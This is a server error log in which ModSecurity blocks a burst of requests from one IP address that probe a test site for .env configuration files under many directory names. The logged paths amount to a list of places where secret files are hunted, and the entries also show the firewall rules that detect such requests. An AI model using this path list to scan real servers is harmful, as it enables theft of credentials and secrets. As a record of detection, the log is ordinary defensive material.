[Wed Jul 23 18:17:08.298402 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBgAAAAQ"]
[Wed Jul 23 18:17:08.298566 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBgAAAAQ"]
[Wed Jul 23 18:17:08.319141 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBwAAAAQ"]
[Wed Jul 23 18:17:08.319367 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBwAAAAQ"]
[Wed Jul 23 18:17:08.319568 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBwAAAAQ"]
[Wed Jul 23 18:17:08.339980 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCAAAAAQ"]
[Wed Jul 23 18:17:08.340199 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCAAAAAQ"]
[Wed Jul 23 18:17:08.340376 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCAAAAAQ"]
[Wed Jul 23 18:17:08.360672 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCQAAAAQ"]
[Wed Jul 23 18:17:08.360894 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCQAAAAQ"]
[Wed Jul 23 18:17:08.361060 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCQAAAAQ"]
[Wed Jul 23 18:17:08.427165 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCgAAAAQ"]
[Wed Jul 23 18:17:08.427407 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCgAAAAQ"]
[Wed Jul 23 18:17:08.427576 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCgAAAAQ"]
[Wed Jul 23 18:17:08.448017 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCwAAAAQ"]
[Wed Jul 23 18:17:08.448242 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCwAAAAQ"]
[Wed Jul 23 18:17:08.448437 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PCwAAAAQ"]
[Wed Jul 23 18:17:08.469303 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PDAAAAAQ"]
[Wed Jul 23 18:17:08.469554 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PDAAAAAQ"]
[Wed Jul 23 18:17:08.469728 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PDAAAAAQ"]
[Wed Jul 23 18:17:08.490186 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PDQAAAAQ"]
[Wed Jul 23 18:17:08.493467 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PDQAAAAQ"]
[Wed Jul 23 18:17:08.493646 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PDQAAAAQ"]
[Wed Jul 23 18:17:08.537936 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PDgAAAAQ"]
[Wed Jul 23 18:17:08.538185 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PDgAAAAQ"]
[Wed Jul 23 18:17:08.538384 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PDgAAAAQ"]
[Wed Jul 23 18:17:08.577970 2025] [authz_core:error] [pid 1389900] [client 185.177.72.107:17598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Wed Jul 23 18:17:08.777529 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PEwAAAAQ"]
[Wed Jul 23 18:17:08.777766 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PEwAAAAQ"]
[Wed Jul 23 18:17:08.777935 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PEwAAAAQ"]
[Wed Jul 23 18:17:08.798492 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PFAAAAAQ"]
[Wed Jul 23 18:17:08.798794 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PFAAAAAQ"]
[Wed Jul 23 18:17:08.798969 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PFAAAAAQ"]
[Wed Jul 23 18:17:08.819633 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PFQAAAAQ"]
[Wed Jul 23 18:17:08.819863 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PFQAAAAQ"]
[Wed Jul 23 18:17:08.820031 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PFQAAAAQ"]
[Wed Jul 23 18:17:08.852315 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PFgAAAAQ"]
[Wed Jul 23 18:17:08.852559 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PFgAAAAQ"]
[Wed Jul 23 18:17:08.852729 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PFgAAAAQ"]
[Wed Jul 23 18:17:08.911721 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aIELBG6wfjR6tSMvn7_PGAAAAAQ"]
[Wed Jul 23 18:17:08.911966 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aIELBG6wfjR6tSMvn7_PGAAAAAQ"]
